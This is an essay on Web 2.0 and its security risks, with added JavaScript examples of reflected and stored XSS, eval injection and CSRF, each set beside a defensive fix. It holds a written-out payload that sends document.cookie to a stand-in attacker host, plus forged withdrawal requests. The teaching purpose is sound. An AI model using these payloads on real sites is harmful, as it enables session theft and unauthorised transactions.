Abstract
Web 2.0 is the second generation of the internet. It brings changes to the online community in many aspects, such as participation, collaboration and socialization. Apart from influencing individuals, enterprises are also immersed in this technology development: Web 2.0 brings opportunities to build new business models rather than relying on traditional marketing approaches. It was ignited by many internet technology giants, such as Google, YouTube, wikis and Flickr. On the other hand, security has become more critical than ever before. This project aims to identify the impact of Web 2.0, present the vulnerabilities that accompany its new features, demonstrate possible types of attack, and discuss existing mature approaches to defending against these security threats. Some of the author's original concepts for internet application development will also be elaborated.
Introduction to Web 2.0
Origin of Web 2.0
People have held different perspectives on Web 2.0 since the birth of the concept. Some consider sharing its most prominent feature, while others point to collaboration as a great step in internet evolution. To clarify what Web 2.0 is, a Web 2.0 conference session between O'Reilly and MediaLive International was held in late 2004; it consolidated seven characteristics of Web 2.0:
The Web As Platform
Harnessing Collective Intelligence
Data is the Next Intel Inside
End of the Software Release Cycle
Lightweight Programming Models
Software Above the Level of a Single Device
Rich User Experiences
These concepts are based on observation of the companies that survived the dot-com collapse. From these, Dale Dougherty, a web pioneer, pointed out that the web would become more important than ever (Oreilly, 2007). Moreover, these concepts lead to the definition of Web 2.0. Meanwhile, the internet technology companies exhibiting these characteristics achieved great success.
Performance of Some Web 2.0 Giants
"Facebook was not originally created to be a company. It was built to accomplish a social mission — to make the world more open and connected."
– Mark Zuckerberg in a letter ahead of Facebook’s IPO filing / February 01, 2012
Facebook is a typical Web 2.0 site. It serves people's social networking needs. Its active users grew from 100 million in August 2008 to 1 billion within four years. Table 1-1 illustrates its rapid expansion up to October 2012.
Table 1 Facebook User Growth
While Facebook drew people's attention, other Web 2.0 sites also showed excellent performance in many areas. YouTube, for example, is estimated to receive 60 hours of new video every minute, has eight hundred million unique users a month, and was ranked the third most visited site in 2012. The internet giant Google is certainly the standard bearer of Web 2.0. It provides services to end users rather than selling software; users pay directly or indirectly for these services, and Google occupies the biggest portion of the search engine market. Table 1-2 shows the share of the UK search engine market: Google owns 90.84 per cent of users, while Yahoo has only 3.15 per cent.
Figure 1 UK Search Engine Market Share
In conclusion, Web 2.0 has a great impact on us in many ways. Once you surf the internet, you might be acting as a participant in, or contributor to, Web 2.0.
Features of Web 2.0
Apart from Web 2.0's influence, we might be interested in exploring the features behind this buzzword. Extending Tim O'Reilly's concepts of Web 2.0, there are seven factors (Oreilly, 2007):
Folksonomy : Free Classification of Information
Rich User Experience
User as a Contributor
Long Tail
User Participation
Basic Trust
Dispersion
We explain some of the most popular items here. First is folksonomy, which refers to collaborative classification and is often called tagging; Flickr, for example, lets users freely choose keywords. The next interesting feature is user participation: Amazon provides a space for customers to post reviews and even uses this user activity to produce better search results. Last is the long tail. It might be a new term to readers, but it has a huge effect on internet commerce; Google, for example, makes use of the collective power of many small sites to increase profit.
Online Retail, a Web 2.0 Business Model
"Facebook has more than 800 million users. More than 50% log in everyday", Mary Meeker said at the Web 2.0 Summit 2011. This reflects user behaviour and the blooming of the internet industry. Here we investigate some Web 2.0 business models.
There are seven business models: online retail, advertising supported, subscription, download fees, affiliate marketing, software as a service, and brokerage or intermediary (Funk, 2008). Here we focus on online retail only, also called ecommerce. Ecommerce plays havoc with some brick-and-mortar retailers: because no one can anticipate how a market moves, it is not easy for them to satisfy broad demand. Ecommerce, however, adapts easily to such requirements; Amazon, for example, provides a broad range of products such as books, music CDs and movies. Ecommerce also treats small businesses kindly: mom-and-pop shops can be discovered by customers from far and wide. This phenomenon is strongly associated with the "long tail", one of the features mentioned earlier. Because Web 2.0 provides an enormous choice of inventory, we are not restricted to any particular local store. Furthermore, we can make use of another advantage of Web 2.0, user participation, which helps traditional ecommerce websites overcome their lack of warmth and interaction.
But no technology is flawless. Security threats to Web 2.0 are becoming crucial, since they can damage reputation, trust and more.
Web 2.0 Security Threats
Web 2.0 Worsens the Security?
The answer to this section's title is probably yes. In the Web 1.0 era, as long as you did not launch an executable or open a suspicious attachment, you would generally not be infected by a virus. Now, malicious code can execute as soon as you visit a web page (a drive-by download).
Meanwhile, Web 2.0 requires more interactive technology, such as widgets, applets and other add-ons; Flash and Shockwave are among the best-known multimedia players. However, we have to be more vigilant when prompted to install a plugin, since most of us are not cybercrime experts and do not have enough knowledge to identify whether the software is harmful to our systems.
Recent Cybercrimes
In the time of Web 2.0, there are various types of cybercrime. One of the most frequent attack flaws is cross site scripting. Table 2-1 depicts the percentage of different cybercrime categories in Q3 2012. It shows cross site scripting as the most severe threat at 35 per cent, with 76% of cases occurring in North America and 16% in Southern Asia. It is followed by cross site request forgery at 29% and directory traversal at 24%. The lightest is SQL injection at 12%. This report is based on 15 million attacks blocked by FireHost servers in the US and Europe during Q3 2012. Moreover, "Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley.
Figure 2 Cybercrime statistics, FireHost Report 2012
Challenges to Business Organization
Social networking websites such as Twitter and Facebook show intense customer engagement and creativity. Some companies are aware of these features and keen to deploy Web 2.0 solutions in order to increase productivity: productivity may rise significantly through a high degree of user participation at a light technology investment. On the other hand, some companies restrict the use of these new technologies, Facebook among them; their primary concerns are data leaks and security risks. Table 2-2 shows the security concerns of company leaders. Malware introduction is the greatest worry, followed by virus introduction.
Figure 2 Top security threat concern
Existing Security Issues
In this section, we discuss the security issues that come with Web 2.0. You should not be surprised if a cybercrime described here resembles one we have known since the birth of the WWW: as internet technology improves, cybercrime evolves along with the new features, and even makes use of the new technologies.
The Secure Enterprise 2.0 Forum, in 2009, identified the top Web 2.0 security vulnerabilities as follows:
Insufficient Authentication Controls
Cross Site Scripting (XSS)
Cross Site Request Forgery (CSRF)
Phishing
Information Leakage
Injection Flaws
Information Integrity
Insufficient Anti-automation
Here we focus on cross site scripting and cross site request forgery only. The attack mechanism and a real scenario are introduced for each.
Cross Site Scripting
As we saw earlier, cross site scripting was the most harmful threat in Q3 2012. Why it works in Web 2.0, and how, may interest us most.
First, XSS is not new. Many websites have been compromised by this kind of attack. If the application supports JavaScript, it opens the door for an attacker to steal your identity or account. The recent burst of user-written content has increased the chance of exploiting XSS vulnerabilities. For example, an attacker can inject malicious code into a blog, social networking site or wiki. When the script is loaded into your browser and executed, in the current DOM context, the malicious code can retrieve critical information from cookies, such as the session identifiers of banking or trading sites. Figure 2-3 illustrates a sequence diagram of an attacker using a malicious script to hijack a user's account.
Cookie theft and account hijacking
Figure 2 Sequence Diagram for XSS
Let us consider the simplest mechanism. There is a website with the following index page:
An attacker could craft a URL as follows and send it to a victim:
In this example the victim's browser executes the script reflected by echo $name; apart from an annoying "attacked" popup, no other damage happens. However, a real attacker could make use of this vulnerability to do much more. We can now summarize the attack: when a user provides data through an HTTP query parameter, and the server script displays it to the user without validating or encoding it, the echoed script can be used to collect the user's identity. This is also called non-persistent (reflected) XSS.
Persistent XSS can have an even more devastating effect. It occurs when the server stores the unusual data without validation, so that when a user browses an innocent-looking page the malicious code is loaded silently and executed in the background. Suppose a dating website hides members' names and email addresses for privacy. An attacker could nevertheless inject his own script by answering a profile question, such as "describe your ideal dating place". Later, when anyone visits "her" profile, the visitor's browser executes the script automatically and sends the visitor's name and email to the attacker.
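The two mechanisms just described, reflected and stored XSS, as an added example that is not part of the original essay and not the index-page snippet it refers to: a simulated server renders the name query parameter (the essay's echo $name) and a stored profile answer first raw, then HTML-encoded on output. Node's URL class stands in for the server's query parsing; the host names, the in-memory profile store and the payloads are constructed for the example.

```javascript
// Added example (not the essay's own code): reflected and stored XSS in a
// tiny simulated server, beside the output-encoded fix.
// Assumed: the index page greets the visitor by the `name` query parameter
// (the essay's `echo $name`), and a profile page shows a stored free-text
// answer ("describe your ideal dating place").

// Contextual output encoding for HTML text and attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// --- Reflected (non-persistent) XSS -------------------------------------
// Vulnerable: the parameter is concatenated straight into the page.
function renderIndexVulnerable(url) {
  const name = new URL(url).searchParams.get('name') ?? 'guest';
  return `<html><body><h1>Hello, ${name}</h1></body></html>`;
}

// Fixed: the same page, but every untrusted value is HTML-encoded on output.
function renderIndexSafe(url) {
  const name = new URL(url).searchParams.get('name') ?? 'guest';
  return `<html><body><h1>Hello, ${escapeHtml(name)}</h1></body></html>`;
}

// --- Stored (persistent) XSS --------------------------------------------
// An in-memory "database" of profiles; the attacker's answer is stored as-is.
const profiles = new Map();

function saveProfileAnswer(userId, answer) {
  // Storing raw text is not itself the bug; rendering it raw later is.
  profiles.set(userId, { answer });
}

function renderProfileVulnerable(userId) {
  const p = profiles.get(userId);
  return `<div class="answer">${p.answer}</div>`;
}

function renderProfileSafe(userId) {
  const p = profiles.get(userId);
  return `<div class="answer">${escapeHtml(p.answer)}</div>`;
}

// Does the rendered HTML contain a live <script> element? A crude check,
// used only to make the difference between the two renderings visible.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker inputs: the essay's "attacked" popup, then an
// exfiltration payload of the kind a stored attack would carry.
const reflectedPayloadUrl =
  'https://shop.example/index.php?name=' +
  encodeURIComponent('<script>alert("attacked")</script>');
const storedPayload =
  '<script>fetch("https://attacker.example/c?d="+encodeURIComponent(document.cookie))</script>';

saveProfileAnswer('attacker', storedPayload);

function demo() {
  return {
    reflectedVulnerable: containsScriptTag(renderIndexVulnerable(reflectedPayloadUrl)),
    reflectedSafe: containsScriptTag(renderIndexSafe(reflectedPayloadUrl)),
    storedVulnerable: containsScriptTag(renderProfileVulnerable('attacker')),
    storedSafe: containsScriptTag(renderProfileSafe('attacker')),
  };
}

console.log(demo()); // { reflectedVulnerable: true, reflectedSafe: false, storedVulnerable: true, storedSafe: false }
```

The fix is the same for both variants: encode at the point of output for the context the value lands in, rather than trying to filter "dangerous" input on the way in. escapeHtml covers HTML text and quoted attribute values only; a value placed inside a script block, a URL or a CSS property needs the encoder for that context.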
There are several reasons Web 2.0 amplifies the XSS threat; the most fundamental is that Web 2.0 leverages DOM-based entry points. On this basis, three major factors dominate XSS in Web 2.0 applications: dynamic DOM manipulation, dynamic script execution, and event-driven XSS in the DOM (Shah, 2008). Below we explain how these factors combine to compromise security.
As users, we want to minimize page reloads and refreshes. Developers achieve this by relying heavily on updating parts of the DOM. An attacker can read the client-side script, determine the key data it consumes and work out how to abuse those calls; this gives the attacker the chance to inject malicious code. Consider a specific attack: a website parses the query string and passes the parsed data to eval in its script.
An attacker can notice this and frame a URL as below:
If a victim is enticed to click the link, the routine's eval statement executes information originating from an untrusted source without sanitizing the input, which gives the attacker the opportunity to execute a dynamic script; the XSS successfully executes the alert. An attacker can be cleverer than we think: he can even inject malicious code into an incoming data stream, where the harmful script waits for an event to fire it. We can see that XSS turns Web 2.0's scripting feature against itself.
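The eval-on-query-string pattern above, as an added example that is neither the essay's nor Shah's code: a client-side routine that builds an object from a profile parameter with eval, beside a version that parses it strictly. The page contract (a URL carrying ?profile=<JSON object>), the host names and the payload are assumptions; Node runs the parsing logic and the DOM update is left out so the example runs without a browser.

```javascript
// Added example (not the essay's or Shah's code): a client-side routine that
// evals data taken from the query string, beside a version that parses it
// strictly. Assumed page contract: the URL carries ?profile=<JSON object>
// and the script turns it into an object to update part of the DOM.

// Vulnerable: eval "parses" the JSON, so any JavaScript expression in the
// parameter runs with the page's full privileges (cookies, DOM, XHR).
function loadProfileVulnerable(url) {
  const raw = new URL(url).searchParams.get('profile');
  // eslint-disable-next-line no-eval
  return eval('(' + raw + ')');   // attacker-controlled string reaches eval
}

// Fixed: JSON.parse accepts data only, never code, and the result is checked
// against the shape the page expects before it is used.
function loadProfileSafe(url) {
  const raw = new URL(url).searchParams.get('profile');
  let obj;
  try {
    obj = JSON.parse(raw ?? '');
  } catch {
    return null;                 // malformed or non-JSON input is rejected
  }
  if (typeof obj !== 'object' || obj === null || Array.isArray(obj)) return null;
  if (typeof obj.name !== 'string' || typeof obj.city !== 'string') return null;
  return { name: obj.name, city: obj.city };   // copy only allow-listed fields
}

// Constructed URLs. The legitimate one is what the site itself generates;
// the malicious one is what an attacker would put in a link. The payload is
// object-literal text that eval accepts but which also executes a statement:
// here it sets a marker instead of the essay's alert() or cookie theft.
const legitimateUrl =
  'https://social.example/view?profile=' +
  encodeURIComponent('{"name":"Alice","city":"Leeds"}');
const maliciousUrl =
  'https://social.example/view?profile=' +
  encodeURIComponent('{"name": (globalThis.xssFired = "document.cookie stolen", "Alice"), "city":"Leeds"}');

function demo() {
  delete globalThis.xssFired;
  const v = loadProfileVulnerable(maliciousUrl);   // runs the attacker's code
  const firedByEval = globalThis.xssFired === 'document.cookie stolen';

  delete globalThis.xssFired;
  const s = loadProfileSafe(maliciousUrl);         // rejected, nothing runs
  const firedBySafe = globalThis.xssFired !== undefined;

  return {
    evalReturnedName: v.name,   // "Alice": the page still looks normal to the victim
    firedByEval,                // true
    safeResult: s,              // null
    firedBySafe,                // false
    legitimateSafe: loadProfileSafe(legitimateUrl), // { name: 'Alice', city: 'Leeds' }
  };
}

console.log(demo());
```

Note that the eval'd payload still returns a well-formed profile, so the victim sees nothing unusual on the page; the side effect is what matters. Replacing eval with JSON.parse removes the code path entirely, and the shape check on top of it keeps unexpected keys from reaching later DOM-writing code.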
Cross Site Request Forgery
Apart from XSS, cross site request forgery is the next most frequent attack. It occurs when a malicious website causes the victim's browser to perform an unwanted action on a trusted site, such as transferring money, harvesting email, violating user privacy or compromising a user account. These attacks have not drawn much attention from developers or the security community, since many believe that defences against XSS also protect against CSRF (Zeller & Felten, 2008). However, that is not true. We look at how CSRF works in this section.
Consider a scenario: Alice, a chat forum member, regularly browses the forum and checks her bank account at around the same time. An attacker who notices this pattern could craft an HTML image tag as follows:
and post it in the chat forum. Once Alice browses the forum, her browser attempts to load the image; if the session cookie for the bank has not expired, the withdrawal may be performed successfully.
One of the Web 2.0 technology frameworks is Ajax; Web 2.0 applications use XMLHttpRequest to communicate with the backend server, and these requests often proceed unnoticed by the user. Fortunately, browsers enforce the same-origin policy on XHR to prevent cross site requests, but if an attacker can find an XSS flaw it is still possible to compromise a specific account (Shah, 2008). Below is a scenario showing how an attacker can achieve CSRF.
Suppose a victim places an order on a specific website through an Ajax call. The Ajax code might use the following XML stream to send the request:
The attacker can observe the victim's HTTP request as follows:
The attacker can easily produce the same HTTP request from a traditional static page like the following:
The HTTP request generated from this page is almost identical to the one generated by Ajax. There is one subtle difference: the Content-Type will not be the same, since the form submission is sent as text/plain rather than the content type the Ajax call used. However, if the server does not check this difference, it opens the door for an attacker to mimic a normal transaction.
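The server side of both CSRF scenarios above, the forum image tag and the static page that mimics the Ajax call, as an added example that is not the essay's code: a handler that trusts the session cookie alone, beside one that also requires POST, the content type the genuine Ajax client sends, an Origin header equal to the site's own, and a per-session anti-CSRF token carried in a request header (a defence the essay's outline names and Zeller & Felten describe). The endpoint, host names, session id, token value and the three request objects are constructed for the example.

```javascript
// Added example (not the essay's code): the bank side of the two CSRF
// scenarios, with a server that trusts the session cookie alone beside one
// that also checks method, Content-Type, Origin and an anti-CSRF token.
// Endpoint names, session ids and token values are constructed.

// Requests are modelled as plain objects, roughly what a framework hands a
// handler: method, path, query, headers (lower-cased names), cookies, body.
const sessions = new Map([
  // Alice is logged in; the server issued this token when the session began.
  ['sess-alice-7f3a', { user: 'alice', csrfToken: 'tok-91c4e0b2' }],
]);

function getSession(req) {
  return sessions.get(req.cookies.session) ?? null;
}

// Vulnerable: any request carrying a valid session cookie is executed,
// whether it came from the bank's own page, a forum <img>, or a hidden form.
function handleWithdrawVulnerable(req) {
  const s = getSession(req);
  if (!s) return { status: 401 };
  const amount = req.method === 'GET' ? req.query.amount : req.body?.amount;
  return { status: 200, action: `withdraw ${amount} for ${s.user}` };
}

// Hardened: state changes need POST, the site's own content type, an Origin
// that is the site itself (browsers attach Origin to cross-site POSTs), and
// the session's anti-CSRF token echoed in a header that a plain <form> or
// <img> cannot set. In production compare the token in constant time.
const SITE_ORIGIN = 'https://bank.example';

function handleWithdrawSafe(req) {
  const s = getSession(req);
  if (!s) return { status: 401 };
  if (req.method !== 'POST') return { status: 405 };      // the <img> GET stops here
  const mediaType = (req.headers['content-type'] ?? '').split(';')[0].trim();
  if (mediaType !== 'application/json') return { status: 415 }; // text/plain form stops here
  if (req.headers['origin'] !== SITE_ORIGIN) return { status: 403, reason: 'origin' };
  if (req.headers['x-csrf-token'] !== s.csrfToken) return { status: 403, reason: 'token' };
  return { status: 200, action: `withdraw ${req.body.amount} for ${s.user}` };
}

// Constructed requests, all carrying Alice's still-valid session cookie.
// 1. The forum <img src="https://bank.example/withdraw?amount=500&to=attacker">
const imgTagRequest = {
  method: 'GET', path: '/withdraw', query: { amount: '500', to: 'attacker' },
  headers: { referer: 'https://forum.example/thread/42' },
  cookies: { session: 'sess-alice-7f3a' }, body: null,
};
// 2. The hidden auto-submitting form with enctype="text/plain" mimicking Ajax
const forgedFormRequest = {
  method: 'POST', path: '/withdraw', query: {},
  headers: { 'content-type': 'text/plain', origin: 'https://attacker.example' },
  cookies: { session: 'sess-alice-7f3a' },
  body: { amount: '500', to: 'attacker' },
};
// 3. The bank's own Ajax client
const genuineXhrRequest = {
  method: 'POST', path: '/withdraw', query: {},
  headers: { 'content-type': 'application/json; charset=utf-8',
             origin: SITE_ORIGIN, 'x-csrf-token': 'tok-91c4e0b2' },
  cookies: { session: 'sess-alice-7f3a' },
  body: { amount: '50', to: 'bob' },
};

function demo() {
  const all = [imgTagRequest, forgedFormRequest, genuineXhrRequest];
  return {
    vulnerable: all.map(r => handleWithdrawVulnerable(r).status),
    safe: all.map(r => handleWithdrawSafe(r).status),
  };
}

console.log(demo()); // { vulnerable: [ 200, 200, 200 ], safe: [ 405, 415, 200 ] }
```

The content-type check alone is the one the essay points at, and it does stop the text/plain form; the Origin and token checks are there because a content type is only a weak signal (an XSS flaw on the site, as the text notes, lets an attacker send a genuine XHR with any header). Each check fails closed on its own, so removing one does not silently admit the forged requests.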
Case studies with Recent Attacks
Potential Security Risks
Study of Web 2.0 Vulnerability
Possible Types of Attack In The Future
How to protect against Web 2.0 Threats
Antivirus software Versus Web 2.0 Threats
Technical Approaches to Developer
Relationship Based Access Control
Anti-CSRF with Token and More
Ways to Secure Our Working Environment
Case studies: How to avoid Facebook Disaster
Further Study on Web 2.0 Security
Describe a Secured Web 2.0 Model
Possible Web 2.0 Development Strategy
Web 2.0 and Future Outlook
Web 2.0: End or New Life
Web 3.0 and Security 3.0
Appendix and List of Figures
Article name: Origin Of Web 2 Computer Science essay, research paper, dissertation